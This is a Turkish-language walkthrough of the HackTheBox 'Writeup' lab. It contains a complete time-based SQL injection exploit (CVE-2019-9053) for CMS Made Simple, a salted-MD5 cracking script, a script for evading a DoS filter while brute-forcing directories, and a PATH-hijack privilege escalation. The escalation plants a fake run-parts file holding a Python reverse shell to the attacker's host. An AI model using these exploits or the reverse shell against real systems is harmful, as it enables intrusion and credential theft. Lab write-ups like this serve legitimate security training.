İçeriğe geç

Writeup

Makine Adı Seviye OS Logo
Writeup - HTB Orta Linux

Walkthrough

nmap taraması:


┌──(root💀kali)-[~]                                                                            
└─# nmap -p- -A -T4 10.10.10.138                                                               
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-03 18:36 EDT                                
Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan                
SYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)                     
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                     
NSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)                                  
Nmap scan report for 10.10.10.138                                                              
Host is up (0.069s latency).                                                                   
Not shown: 65533 filtered ports                                                                
PORT   STATE SERVICE VERSION                                                                   
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                             
| ssh-hostkey:                                                                                 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)                                 
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)                                
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)                              
80/tcp open  http    Apache httpd 2.4.25 ((Debian))                                            
| http-robots.txt: 1 disallowed entry                                                          
|_/writeup/                                                                                    
|_http-server-header: Apache/2.4.25 (Debian)                                                   
|_http-title: Nothing here yet.                                                                
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 
(92%), Linux 4.4 (92%), Linux 4.8 (92%)                                                        
No exact OS matches for host (test conditions non-ideal).                                      
Network Distance: 2 hops                                                                       
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                        

TRACEROUTE (using port 22/tcp)                                                                 
HOP RTT      ADDRESS                                                                           
1   68.76 ms 10.10.14.1                                                                        
2   68.83 ms 10.10.10.138                                                                      

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.78 seconds      

80'i görünce tarama yapmaya başlayacaktım ancak belirli tarama işlemleri yapılınca portun kapatıldığını gördüm. Belirli bir süre servis düşüyor ve daha sonrasında tekrar açılıyor. Bu çok kötü çünkü dirb, gobuster gibi araçları kullanamayacağım anlamına geliyor. Daha sonrasında tarayıcıdan sayfaya gittim. Bir ddos ürünü kullanıldığını söylemiş ve 40* hataları alındığında bunu bir ddos olarak düşünüp servisi belirli bir süre durduruyor. İlk olarak sayfadaki bütün kelimleri çektim ve bir wordlist oluşturdum.


┌──(root💀kali)-[~/10.10.10.138]
└─# cewl --lowercase --with-numbers -d 3 http://10.10.10.138/ -w wordlist

Daha sonrasında bir python script'i yazdım. Bu script aracılığıyla sunucu 404'ten dolayı kapatıldığında belirli bi süre bekleyip daha sonrasında tekrar dosya dizin keşfine devam ediyordu. Kodum aşağıda verilmiştir.


┌──(root💀kali)-[~/10.10.10.138]
└─# cat exploit/dirbb.py                                                                                                                                                                130 ⨯
path = input("Dosya adı:\r\n")
dosya = open(path)
wordlist = dosya.read().split("\n")
dosya.close()

dizi200 = []
url = "http://10.10.10.138/"
import requests
import time
sayac = 0
#try:
for i in wordlist:
        sayac = sayac + 1
        try:
                r = requests.get(url+i)
                if(r.status_code == "200"):
                        dizi200.append(url+i)
                url_ = url + i
                print(url_,r.status_code)
        except:
                print("ddos script'e yakalandı, bekleniyor!")
                time.sleep(60)
        if(sayac == 5):
                time.sleep(10)
                sayac = 0
                print("---------------")
                for ii in dizi200:
                        print(ii)
                print("---------------")
#except:
#       print("ddos script'e yakalandı, bekleniyor!")
#       time.sleep(60)

┌──(root💀kali)-[~/10.10.10.138]
└─# python3 exploit/dirbb.py  
...
...
http://10.10.10.138/apache 404                                                                                                                                                                
http://10.10.10.138/40x 404                                                                                                                                                                   
http://10.10.10.138/errors 404                                                                                                                                                                
http://10.10.10.138/bans 404                                                                                                                                                                  
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
ddos script'e yakalandı, bekleniyor!                                                                                                                                                          
ddos script'e yakalandı, bekleniyor!                                                                                                                                                          
http://10.10.10.138/hope 404                                                                                                                                                                  
http://10.10.10.138/get 404                                                                                                                                                                   
http://10.10.10.138/hit 404                                                                                                                                                                   
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/false 404                                                                                                                                                                 
http://10.10.10.138/positive 404                                                                                                                                                              
http://10.10.10.138/drops 404                                                                                                                                                                 
http://10.10.10.138/where 404                                                                                                                                                                 
http://10.10.10.138/download 404                                                                                                                                                              
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/the 404                                                                                                                                                                   
http://10.10.10.138/proper 404                                                                                                                                                                
http://10.10.10.138/donkey 404                                                                                                                                                                
http://10.10.10.138/please 404                                                                                                                                                                
http://10.10.10.138/let 404                                                                                                                                                                   
---------------                                                                                                                                                                               
---------------                                                                                                                                                                               
http://10.10.10.138/via 404                                                                                                                                                                   
http://10.10.10.138/mail 404                                                                                                                                                                  
http://10.10.10.138/jkr 404                                                                                                                                                                   
http://10.10.10.138/writeup 200    

http://10.10.10.138/writeup adresinde 200 statu code'unu aldım. Sayfaya gittiğimde sayfanın kaynak kodlarını incelerken başlık kısmında CMS Made Simple ifadesini gördüm. Bunun üzerine yayınlanmış bir exploit var mı diye aradım.


└─# searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                                                                          | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                                                                                                     | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                                                                                                     | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                                                                                                  | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                                                                                      | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                                                                                     | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                                                                           | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                                                                                                 | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                                                                        | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                                                                            | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                                                                                                | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                                                                                               | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                                                                                         | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                                                                            | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                                                                                            | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                                                                                               | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery                                                                                     | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection                                                                              | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                                                                            | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                                                                                               | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                                                                              | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                                                                                | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                                                                                    | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)                                                                                                 | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                                                                                                | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)                                                                    | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                                                                               | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                                                                               | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                                                                                             | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                                                                                                    | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                                                                            | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                                                                       | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                                                                              | php/webapps/46546.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

Sqlinjection exploiti buldum ancak python dosyasını düzenlemem gerekiyordu. Python2ye göre yazılmış ve parolayı kırarke program çöküyordu. Düzenlenmiş hali aşağıda verilmiştir.


┌──(root💀kali)-[~/10.10.10.138/exploit]                                                                                                                                                      
└─# cat 46635.py                                                                                                                                                                              
#!/usr/bin/env python                                                                                                                                                                         
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9                                                                                                                    
# Date: 30-03-2019                                                                                                                                                                            
# Exploit Author: Daniele Scanu @ Certimeter Group                                                                                                                                            
# Vendor Homepage: https://www.cmsmadesimple.org/                                                                                                                                             
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/                                                                                                                               
# Version: <= 2.2.9                                                                                                                                                                           
# Tested on: Ubuntu 18.04 LTS                                                                                                                                                                 
# CVE : CVE-2019-9053                                                                                                                                                                         

import requests                                                                                                                                                                               
from termcolor import colored                                                                                                                                                                 
import time                                                                                                                                                                                   
from termcolor import cprint                                                                                                                                                                  
import optparse                                                                                                                                                                               
import hashlib                                                                                                                                                                                

parser = optparse.OptionParser()                                                                                                                                                              
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")   
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")                                                                     [127/205]
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)                                                                  

options, args = parser.parse_args()                                                                                                                                                           
if not options.url:                                                                                                                                                                           
    print("[+] Specify an url target")                                                                                                                                                        
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")                                                                                                        
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")                                                                            
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")                                                                                
    exit()                                                                                                                                                                                    

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'                                                                                                                       
session = requests.Session()                                                                                                                                                                  
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'                                                                                                            
flag = True                                                                                                                                                                                   
password = ""                                                                                                                                                                                 
temp_password = ""                                                                                                                                                                            
TIME = 1                                                                                                                                                                                      
db_name = ""                                                                                                                                                                                  
output = ""                                                                                                                                                                                   
email = ""                                                                                                                                                                                    

salt = ''                                                                                                                                                                                     
wordlist = ""                                                                                                                                                                                 
if options.wordlist:                                                                                                                                                                          
    wordlist += options.wordlist                                                                                                                                                              

def crack_password():                                                                                                                                                                         
    global password                                                                                                                                                                           
    global output                                                                                                                                                                             
    global wordlist                                                                                                                                                                           
    global salt                                                                                                                                                                               
    dict = open(wordlist, encoding='latin-1')                                                                                                                                                 
    for line in dict.readlines():                                                                                                                                                             
        line = line.replace("\n", "")                                                                                                                                                         
        beautify_print_try(line)                                                                                                                                                              
        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:                                                                                                     
            output += "\n[+] Password cracked: " + line                                                                                                                                       
            break                                                                                                                                                                             
    dict.close()                                                                                                                                                                              

def beautify_print_try(value):                                                                                                                                                                
    global output   
    print("\033c")                                                                                                                                                                    [84/205]
    cprint(output,'green', attrs=['bold'])                                                                                                                                                    
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])                                                                                                                                        

def beautify_print():                                                                                                                                                                         
    global output                                                                                                                                                                             
    print("\033c")                                                                                                                                                                            
    cprint(output,'green', attrs=['bold'])                                                                                                                                                    

def dump_salt():                                                                                                                                                                              
    global flag                                                                                                                                                                               
    global salt                                                                                                                                                                               
    global output                                                                                                                                                                             
    ord_salt = ""                                                                                                                                                                             
    ord_salt_temp = ""                                                                                                                                                                        
    while flag:                                                                                                                                                                               
        flag = False                                                                                                                                                                          
        for i in range(0, len(dictionary)):                                                                                                                                                   
            temp_salt = salt + dictionary[i]                                                                                                                                                  
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]                                                                                                                            
            beautify_print_try(temp_salt)                                                                                                                                                     
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"  
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            salt = temp_salt                                                                                                                                                                  
            ord_salt = ord_salt_temp                                                                                                                                                          
    flag = True                                                                                                                                                                               
    output += '\n[+] Salt for password found: ' + salt                                                                                                                                        

def dump_password():                                                                                                                                                                          
    global flag                                                                                                                                                                               
    global password                                                                                                                                                                           
    global output                                                                                                                                                                             
    ord_password = ""                                                                                                                                                                         
    ord_password_temp = ""                                                                                                                                                                    
    while flag:                                                                                                                                                                               
        flag = False     
        for i in range(0, len(dictionary)):                                                                                                                                           [41/205]
            temp_password = password + dictionary[i]                                                                                                                                          
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]                                                                                                                    
            beautify_print_try(temp_password)                                                                                                                                                 
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"                                                                                                         
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"                                                                                        
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            password = temp_password                                                                                                                                                          
            ord_password = ord_password_temp                                                                                                                                                  
    flag = True                                                                                                                                                                               
    output += '\n[+] Password found: ' + password                                                                                                                                             

def dump_username():                                                                                                                                                                          
    global flag                                                                                                                                                                               
    global db_name                                                                                                                                                                            
    global output                                                                                                                                                                             
    ord_db_name = ""                                                                                                                                                                          
    ord_db_name_temp = ""                                                                                                                                                                     
    while flag:                                                                                                                                                                               
        flag = False                                                                                                                                                                          
        for i in range(0, len(dictionary)):                                                                                                                                                   
            temp_db_name = db_name + dictionary[i]                                                                                                                                            
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]                                                                                                                      
            beautify_print_try(temp_db_name)                                                                                                                                                  
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"                             
            url = url_vuln + "&m1_idlist=" + payload                                                                                                                                          
            start_time = time.time()                                                                                                                                                          
            r = session.get(url)                                                                                                                                                              
            elapsed_time = time.time() - start_time                                                                                                                                           
            if elapsed_time >= TIME:                                                                                                                                                          
                flag = True                                                                                                                                                                   
                break                                                                                                                                                                         
        if flag:                                                                                                                                                                              
            db_name = temp_db_name         
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print(colored("[*] Now try to crack password"))
    crack_password()

beautify_print()

Kodu çalıştırdığımda aşağıdaki çıktıları aldım.


#[+] Salt for password found: 5a599ef579066807
#[+] Username found: jkr
#[+] Email found: [email protected]
#[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Daha sonrasında kodun içerisindeki hash'i kırma kısmını ayrı bir python koduna kaydettim ve kırma işlemini kendim yaptım. Python kodu aşağıda verilmiştir.

import hashlib
def crack_password():
    password = "62def4866937f08cc13bab43bb14e6f7"
    wordlist = "/usr/share/wordlists/rockyou.txt"
    salt = "5a599ef579066807"
    dict = open(wordlist, encoding="latin-1")
    for line in dict.readlines():
        line = line.replace("\n", "")
#        beautify_print_try(line)
        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:
            print("\n[+] Password cracked: " + line)
            break
    dict.close()

crack_password()

┌──(root💀kali)-[~/10.10.10.138/exploit]                                                       
└─# python3 crack.py

[+] Password cracked: raykayjay9

Ssh ile bağlantı yaptığımda user flag'i okudum.


┌──(root💀kali)-[~]
└─# ssh [email protected]                   
[email protected]'s password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ pwd
/home/jkr
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt
846446f10caff03660d3ef24705e13ec
jkr@writeup:~$ 

İçeride bir takım kontroller gerçekleştirdim ki bana göre python kütüphanlerini kullanarak root olmamız lazım ancak başarılı olmadı. Bunun sebebini gerçekten anlamş değilim. Neyse...

Makineye pspy aracını attım ve processleri görüntülemeye başladım.


jkr@writeup:/tmp$ wget http://10.10.14.21/pspy32s
--2021-10-04 18:38:52--  http://10.10.14.21/pspy32s
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1090528 (1.0M) [application/octet-stream]
Saving to: ‘pspy32s’

pspy32s                 100%[==============================>]   1.04M   559KB/s    in 1.9s    

2021-10-04 18:38:54 (559 KB/s) - ‘pspy32s’ saved [1090528/1090528]

jkr@writeup:/tmp$ chmod 777 pspy32s

ssh bağlantısı yaptığımda oluşan process'ler aşağıda verilmiştir..


2021/10/04 18:40:01 CMD: UID=0    PID=2059   | /usr/sbin/CRON 
2021/10/04 18:40:01 CMD: UID=0    PID=2060   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1 
2021/10/04 18:40:05 CMD: UID=0    PID=2061   | sshd: [accepted]
2021/10/04 18:40:05 CMD: UID=0    PID=2062   | sshd: [accepted]  
2021/10/04 18:40:09 CMD: UID=0    PID=2063   | sshd: jkr [priv]  
2021/10/04 18:40:09 CMD: UID=0    PID=2064   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2021/10/04 18:40:09 CMD: UID=0    PID=2065   | run-parts --lsbsysinit /etc/update-motd.d 
2021/10/04 18:40:09 CMD: UID=0    PID=2066   | /bin/sh /etc/update-motd.d/10-uname 
2021/10/04 18:40:09 CMD: UID=0    PID=2067   | sshd: jkr [priv]  

Görüldüğü üzere run-parts isimli program bir path belirtilmeden çalıştırılmış.

PATH'e baktığımızda:


jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Ayrıca yazaileceğimiz pathlere baktığımızda:

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group jkr:
/tmp/linpeas.sh
  Group cdrom:

  Group floppy:

  Group audio:

  Group dip:

  Group video:

  Group plugdev:

  Group staff:
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

Path'i manipüle edebileceğimzi görebiliyoruz. Bir reverse shell oluşturup root olalım.


jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/tmp$ cd /usr/local/bin
jkr@writeup:/usr/local/bin$ touch run-parts
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

jkr@writeup:/usr/local/bin$ chmod 777 run-parts

Makineye tekrardan ssh ile bağlanmayı denediğimde:

┌──(root💀kali)-[~]
└─# ssh [email protected]
[email protected]'s password: 

1324 portuma reverse geliyor.

┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
bin  root.txt
# cat root.txt
cat root.txt
5fd505e0c8af615cf7f6c36d60ee5276
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir